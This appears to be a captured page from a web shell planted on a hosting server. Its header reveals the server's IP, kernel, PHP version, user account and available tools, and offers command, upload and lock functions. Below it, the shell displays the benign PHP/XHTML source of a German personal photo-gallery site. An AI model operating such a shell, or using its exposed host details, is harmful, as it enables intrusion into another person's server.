gzuncompress
|
Server IP : 172.19.0.3 / Your IP : 216.73.216.178 Web Server : Apache/2.4 System : Linux 880f91b28fd7 5.15.0-117-generic #127~20.04.1-Ubuntu SMP Thu Jul 11 15:36:12 UTC 2024 x86_64 User : tomlinde ( 155017) PHP Version : 5.6.40 Disable Function : dl, syslog, opcache_get_status MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/webpages/lima-city/tomlinde/html/Galindex/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
<?php
//header('Content-type: text/xml');//missing charset
echo '<?xml version="1.0" encoding="UTF-8"?>';
?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<title>Private Bilder von Tom Lindemann</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="author" content="Tom Lindemann"/>
<meta name="keywords" content="Bildergallerie"/>
<meta name="description" content="Bilder"/>
<meta name="copyright" content="Tom Lindemann http://www.toms-web-design.de"/>
<meta name="date" content="2014-03-25"/>
<meta name="language" content="German, de, deutsch"/>
<link rel="shortcut icon" type="image/x-icon" href="image/favicon.ico" />
<link rel="stylesheet" type="text/css" href="style.css"/>
</head>
<body>
<table id="palmsTable">
<tr>
<td id="side_house_left"> </td>
<td id="palmsCenter">
<div id="container">
<div id="logo"><div id="logoTitle">Tom Lindemann</div></div>
<div id="menu">
<ul>
<li><a href="index.php?page=start">Startseite</a></li>
<li><a href="index.php?page=gallery">Gallerien</a></li>
<li><a href="index.php?page=kontakt">Kontakt</a></li>
<li><a href="index.php?page=impres">Impressum</a></li>
</ul>
<div class="rightAd">
<!--Hier kommt Werbung rechte Seite-->
<!--Ende Hier kommt Werbung rechte Seite-->
</div>
<!--XHTML -->
<p style="text-align:center;">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-xhtml11" alt="Valid XHTML 1.1" height="31" width="88"/></a>
</p>
<!--END XHTML -->
<!--Hier kommt Werbung linke Seite-->
<!--Ende Hier kommt Werbung linke Seite-->
</div>
<div id="content">
<!-- Hier wird der Inhalt eingefuegt -->
<?php include("content.php");?>
<!-- ENDE Inhalt -->
<p style="text-align:center">
</div>
<div class="block"></div>
<div id="footer">
<div class="tomswebdesign">
<a href="http://www.toms-Web-Design.de" onclick="window.open(this.href); return false;">
<br/>Webseiten erstellen individuell nach Ihrem Wunsch<br/>
© Copyright 2014 · Toms-Web-Design.de<br/>
</a>
</div>
</div>
</div>
</td>
<td id="side_house_right"> </td>
</tr>
</table>
<!-- copyright"Tom Lindemann http://www.toms-web-design.de" -->
</body>
</html>